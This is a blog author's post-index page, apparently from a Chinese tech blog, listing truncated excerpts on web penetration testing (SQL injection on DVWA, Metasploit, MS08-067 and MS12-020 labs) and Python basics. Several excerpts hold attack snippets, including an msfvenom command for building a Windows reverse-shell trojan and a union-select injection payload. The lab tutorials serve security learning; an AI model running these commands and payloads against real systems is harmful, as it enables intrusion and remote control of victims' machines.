自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Louisnie

Attitude determines Altitud

  • 博客(47)
  • 收藏
  • 关注

转载 检查网站是否可以正常访问

curl -I -m 10 -o /dev/null -s -w %{http_code} www.baidu.com一般正常是返回200

2019-05-30 12:13:42 3796

转载 渗透测试面试笔试题

1.拿到一个待检测的站,你觉得应该先做什么?收集信息whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说…2.mysql的网站注入,5.0以上和5.0以下有什么区别?5.0以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名。5.0以下是多用户单操作,5.0以上是多用户多操做。3.在渗透...

2019-02-28 20:06:06 2594 1

转载 文件上传漏洞总结

https://paper.seebug.org/560/

2019-02-15 15:37:39 713

转载 使用七牛作为图床教程

使用七牛作为图床

2018-10-30 17:43:27 4519

原创 IIS6.0容器之解析漏洞复现

漏洞简介解析漏洞是指web服务器因对HTTP请求处理不当导致将非可执行的脚本,文件等当作可执行的脚本去执行.该漏洞一般配合web容器(iis,nginx,apache,tomcat等)的文件上传功能去使用,以获取服务器的权限.IIS5.X/6.X解析漏洞对于IIS服务器5版本和6版本存在两个解析漏洞,分别为目录解析和文件解析目录解析简介:在网站下建立文件夹的名称中以.asp或.asa等作...

2018-10-30 00:11:57 7326 4

转载 Hexo NexT主题添加点击爱心效果

给NexT主题内添加页面点击出现爱心的效果创建js文件在/themes/next/source/js/src下新建文件clicklove.js,接着把该代码拷贝粘贴到clicklove.js文件中。代码如下:!function(e,t,a){function n(){c(".heart{width: 10px;height: 10px;position: fixed;backgro...

2018-10-21 22:30:51 1870

原创 谈谈Metasploit中payload模块

我们可以不利用漏洞,直接将payload发送给目标主机,诱使其点击,也可获取到目标主机的shell.msf > use payload/windows/shell_bind_tcp #使用该模块绑定(监听)本机的一个TCP连接端口msf payload(windows/shell_bind_tcp) > generate #通过generate生成16进值的payload,默...

2018-10-20 01:24:10 2763

原创 墨者学院--手工注入mysql数据库实例

开启墨者靶场环境,发现此界面,在点击登陆下方的通知之后惊奇的看到存在参数id,可以试试通过传递SQL语句获取数据库信息.我们可以试试1=1和1=2大法,输入在参数id=1后面加入1=1进行逻辑判断显示正常,然后换1=2,因为1=2为一个假命题,如果能插入到数据库进行逻辑判断,那么由于该语句错误,数据库查询不到任何信息,界面就不会显示任何信息根据这种情况可以大概的判断出该网站很大可能存...

2018-10-16 19:40:54 1112

原创 Metasploit初探索

渗透测试者的困扰:需要掌握数百个工具软件,上千条命令参数,很难去全部记住.对于新出现的漏洞PoC/EXP有不同的运行环境要求,准备工 作繁琐.渗透工作者大部分时间都在学习不同工具的使用习惯,如果可以统一那么就方便的多.Metasploit简介:目前最流行,最强大,最具有扩展性的渗透测试平台软件基于Metasploit进行渗透测试和漏洞分析的流程和方法2003年由HD More发布第...

2018-10-12 16:58:57 662

原创 SQL手工注入探索旅程(三)

SQL手工注入探索旅程(一)SQL手工注入探索旅程(一)当无权读取information_schema库或者被拒绝union,order by这些语句通过试验去猜测数据库信息进而总结归纳出结果设置dvwa安全等级为low| 我们在输入框中输入 一下指令:' union select null,user()-- #使用MySQL数据库的user()函数查看当前使用者 得知是r...

2018-10-09 16:15:14 262

原创 SQL手工注入探索旅程(二)

SQL手工注入探索旅程(一)实验环境:kali:192.168.128.128/24metasploitable:192.168.128.129/24首先我们将metasploitable中的dvwa安全等级设置为low

2018-10-02 02:14:52 643

原创 SQL手工注入探索旅程(一)

SQL注入漏洞原理由于程序没有过滤用户的输入,攻击者通过向服务器提交恶意的SQL查询语句,应用程序接收后错误的将攻击者的输入作为原始的SQL查询语句的一部分执行,导致改变了程序原始的SQL查询逻辑,额外的执行了攻击者构造的SQL查询语句实验环境:kali:192.168.128.128/24metasploit:192.168.128.129/24我们首先看一段很简单的PHP代码查询数据...

2018-09-30 17:29:45 9291

原创 手动挖掘之默认安装漏洞

phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。其安装在Web服务器上的接口界面,主要用于使用php来管理安装服务器上的后台数据库(MySQL数据库),但如果采用默认安装,敏感路径未做出处理,便会存在安全漏洞,最突出的是其setup脚本中存在着服务器端请求伪造漏洞。远...

2018-09-28 17:04:03 531

原创 Burpsuite之Spider模块

Burp spider用来映射Web应用程序,他会自动抓取Web应用程序的链接,自动提交它发现的所有登陆表单,从而详细的分析整个应用程序,这些链接会传递给Burp Scanner进行详细的扫描.环境:kali:192.168.128.128/24metasploit:192.168.128.129/241,首先设置登陆的表单信息设置,由于在dvwa中默认用户名为admin,密码为passwr...

2018-09-24 23:22:31 1851 1

原创 零基础学习Burpsuite之目标(Target)工具

零基础学习Burpsuite(一)Burpsuite中的Target工具:我们在前一章使用Burpsuite作为代理可以得到目标访问web服务器的HTTP请求包既保存在Proxy工具中的HTTP history中,也保存在Target中在Target工具中,颜色是深色的URL表示已经真正发送过请求的地址,浅色的URL表示在请求的页面里所存在的其他URL地址,但没有访问过如果只想查看某个网站的...

2018-09-20 02:05:19 838

原创 WebSocket简述

WebSocket是一种在单个TCP连接上进行全双工通信的协议。WebSocket通信协议于2011年被IETF定为标准RFC 6455,并由RFC7936补充规范。WebSocket API也被W3C定为标准。WebSocket使得客户端和服务器之间的数据交换变得更加简单,允许服务端主动向客户端推送数据。在WebSocket API中,浏览器和服务器只需要完成一次握手,两者之间就直接可以创建持...

2018-09-18 21:47:10 249

原创 零基础学习Burpsuite之代理功能

Burp Suite是一个用于测试Web应用程序安全性的图形工具。该工具使用Java编写,由PortSwigger Security开发。该工具有两个版本。可免费下载的免费版(免费版)和试用期后可购买的完整版(专业版)。免费版本功能显着降低。它的开发旨在为Web应用程序安全检查提供全面的解决方案。除了基本功能,如代理服务器,扫描仪和入侵者,该工具还包含更多高级选项,如蜘蛛,转发器,解码器,比较器...

2018-09-18 21:27:24 7769

原创 Windows下轻松搭建DVWA测试环境

DVWA是一款基于php&mysql编写的用于常规WEB漏洞教学和检测的web脆弱性测试web应用。其中包含了SQL注入,盲注,文件包含,XSS,CSRF等一些常见的WEB漏洞,对于我们进行Web渗透提供了很好的平台。开始搭建:1,首先去下载phpstudy和DVWA源码PHPstduy:http://www.phpstudy.net/phpstudy/phpStudy2016110...

2018-09-18 15:03:21 17013 3

原创 HTTP使用的BASIC认证原理

1,BASIC认证概述 在HTTP协议进行通信的过程中,HTTP协议定义了基本认证过程以允许HTTP服务器对

2018-09-12 02:12:53 2984

原创 NTLM身份认证

NTLM身份认证是微软针对容易破解的Lan Manager Challenge/Response(LM)验证机制,提出的WindowsNT挑战相关验证机制,更新的有:NTLM v2和Kerberos验证体系.在服务器端如果不使用Message Queuing 或是Telnet Server,一般NTLM是被关闭的,一般用户也用不上,但对于入侵者来说,NTLM是一座大山,telnet是一种命令行方式...

2018-09-11 00:42:04 11662

原创 W3af---命令行模式实验详解(一)

实验环境: Kali:192.168.128.128 Metasploitable:192.168.128.129安装W3af:kali2.0安装w3af文档 w3af用户接口: console命令行接口 Gui图形界面化接口 API进入w3af命令行界面:root@kali:~/w3af-master# ./w3af_console w3a...

2018-09-10 22:46:35 8512

原创 kali2.0下简介及安装W3af(亲试有效)

简介: w3af是一个Web应用程序攻击和审计框架,旨在识别和利用所有Web应用程序漏洞。该包为框架提供了图形用户界面(GUI)。如果只需要命令行应用程序,请安装w3af-console。该框架被称为“网络的metasploit”,但它实际上远不止于此,因为它还使用黑盒扫描技术发现了Web应用程序漏洞!w3af核心及其插件完全用Python编写。该项目有130多个插件,可识别和利用SQL注入,跨...

2018-09-09 12:32:35 4809

原创 Web扫描之Skipfish详解实践

简介: Skipfish,谷歌创建的Web应用程序安全扫描程序,是一种活跃的Web应用程序安全侦察工具。它通过执行递归爬网和基于字典的探针为目标站点准备交互式站点地图。然后使用许多活动(但希望无中断)安全检查的输出对结果映射进行注释。该工具生成的最终报告旨在作为专业Web应用程序安全评估的基础。主要特征:高速:纯C代码,高度优化的HTTP处理,最小的CPU占用空间 - 通过响应式目标轻松...

2018-09-08 18:04:15 4539

原创 WEB扫描工具之Nikto实践

实验环境:kali:192.168.136.128/24 Metasploitable:192.168.136.129/24 WEB扫描工具 Web扫描工具大部分都支持两种扫描模式:代理截断模式和主动扫描模式 Nikto:是一个Web服务器扫描程序,主要是去检查软件版本信息,搜索存在的安全隐患的文件,服务器配置漏洞,Web Application层面的安...

2018-09-07 01:28:13 7077

原创 Web侦察之Httrack的实践操作

WEB侦察之Httrack 实验环境:kali:192.168.136.128/24 Metasploitable:192.168.136.129/24 Httract简介:HTTrack Website Copier是一个免费并易于使用的线下浏览器工具,它能够让你从互联网上下载整个网站进行线下浏览.浏览线下站点和线上并没有什么不同.HTTrack同样可以进...

2018-09-07 01:21:54 6061

原创 kali2.0安装DVWA(亲测有效)

1,去官网下载DVWA源文件:DVWA 2,解压文件:unzip DVWA-master.zip3,将其移动到/var/www/html文件下,并且重命名为dvwa(重命名纯属为了登陆方便)mv DVWA-master /var/www/html 4,修改文件夹权限:chmod -R 755 dvwa5,启动apache2 和mysqlservi...

2018-09-04 01:17:24 5808

原创 浅谈安全套接层SSL

SSL一般用于对万维网客户与服务器之间传送的数据进行加密和鉴别.它在双方的联络阶段(也就是握手阶段)对将要使用的加密算法(如用DES或RSA)和双方共享的会话密钥进行协商,完成客户与服务器之间的鉴别,在联络阶段完成之后,所有传送的数据都使用在联络阶段商定的会话密钥.SSL不仅被所有的常用浏览器和万维网服务器所支持,而且也是运输层安全协议TLS的基础.SSL并不仅局限于万维网的应用,他们还可用于...

2018-09-03 20:19:29 1044

原创 简述python文件操作

读写文件是最常见的IO操作,python内置了读写文件的函数,用法和C是兼容的.读写文件前,我们先必须了解一下,在磁盘上读写文件的功能都是由操作系统提供的,现代操作系统不允许普通的程序直接操作磁盘,所以读写文件就是请求操作系统打开一个文件对象(通常称为文件描述符),然后通过操作系统提供的接口从这个文件对象中读取数据(读文件),或者把数据写入这个文件对象(写文件) 读文件 在python...

2018-09-02 23:27:22 532

原创 python和函数的故事(缺省参数,匿名函数)

缺省参数 python为了简化函数的调用,提供了默认的参数机制制作一个函数,名为pow,传入默认形参n=2,计算任意一个数的平方def pow(x, n = 2): #定义一个函数pow,传入形参x,设置形参n=2,如果实参中没有指定的话,那么参数n就是用默认值2带入式中 r = 1 while n > 0: ...

2018-09-02 01:00:32 1236

原创 python3中交换2个变量的方式总结

第一张方法a=4b=5c=0 #取一个额外的变量作为中间人c=aa=bb=c第二种方法:a=4b=5a=a+bb=a-b #此时a=4+5,那么此时b=4+5-5=4a=a-b #此时a=9,b=4,那么新获得的a为5第三种方法:a=4b=5a,b=b,a #python特有的传值方式...

2018-09-02 00:53:33 415

原创 python与函数的故事(局部变量,全局变量和递归函数)

局部变量:即在函数内定义的变量,对于不同的函数,可以定义相同名称的变量值,而且每个变量并不影响,局部变量用于临时保存数据因而在函数中定义变量来进行存储.这里写代码片...

2018-09-01 18:30:32 370

原创 Msfvenom制作Windows木马程序

Mefvenom简介: msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线开始制作: 1:生成木马程序:msfvenom -p windows/meterpreter/reverse_tcp lhost=自己的ip lport=端口号(越大越好,不能超过65535) ...

2018-08-29 20:49:07 4105

原创 微软ms08-067渗透实践

简单描述:MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的...

2018-08-29 20:28:41 5212

原创 微软MS12-020漏洞渗透实验

MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,可导致BSOD(死亡蓝屏)远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未...

2018-08-29 12:56:01 7683

原创 python与函数的故事(基础篇)

函数是组织好的,可重复使用的,用来实现单一,或相关联功能的代码段。函数能提高应用的模块性,和代码的重复利用率。Python提供了许多内嵌函数,如下图: 可以通过查看官网了解pthon内置函数的功能:python官网之内置函数 也可以在交互命令行通过help(函数名)查看该函数帮助信息.int("123") #使用int函数可以将字符串"123" 转换成整型123...

2018-08-28 15:55:20 263

原创 简述python中的元组

Python的元组(tuple)与列表(list)类似,不同之处在于元组的元素不能修改,所以列表可以增删改查,元组只支持查询和遍历.元组使用小括号,列表使用方括号。元组创建很简单,只需要在括号中添加元素,并使用逗号隔开即可。a=(1,2,3,4,5) #创建元组a,并赋值a[0] #根据...

2018-08-28 15:48:13 211

原创 python之循环,遍历,嵌套

遍历:将文件,字符串,列表,元组,字典等里面的数据一一列举出来字符串遍历:num="hello,world" #创建字符串并赋值for i in num: #对于字符串的for循环遍历,变量I表示该字符串中任意一个元素,i只为一个变量,可以随意起名 print (i) #输出的是该字符串的每个字符,输出一个字符换一...

2018-08-28 15:46:44 1867

原创 python中字典的常见操作

Python字典是一种可变容器模型,且可存储任意类型对象,如字符串、数字、元组等其他容器模型。字典的每个键值(key=>value)对用冒号(:)分割,每个对之间用逗号(,)分割,整个字典包括在花括号({})中 ,格式如下所示:d = {key1 : value1, key2 : value2 }键必须是唯一的,但值则不必。值可以取任何数据类型,但键必须是不可变的,如字符...

2018-08-28 15:41:56 1726

原创 python中列表的增删改查

list列表是python内置的一种数据类型,list是一种有序的集合,可以随时添加和删除元素创建列表 格式:在[ ]中添加各种数据,使用逗号将其分隔开来如果是空列表,直接[]通常会把list赋值给一个变量,通过这个变量引用列表score=['Bob','Tom','Jack',98,90,True,False]由于Python是动态语言,所以list中包含的元素并不要求...

2018-08-28 15:36:11 1280

原创 python字符串的常见操作

1,字符串 1.1,字符串的创建和赋值 字符串是python中最常见的数据类型,我们使用引号(单引号或者双引号都可以)来创建字符串创建字符串很简单,只要给变量赋一个值即可,例如:var1="hello,world!"var2="helli,python!"1.2,字符串的索引和切片 python的下标就是编号,就好比超市中的存储柜的编号,通过这个编号就能找到相应的存储空间...

2018-08-28 15:29:30 275

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除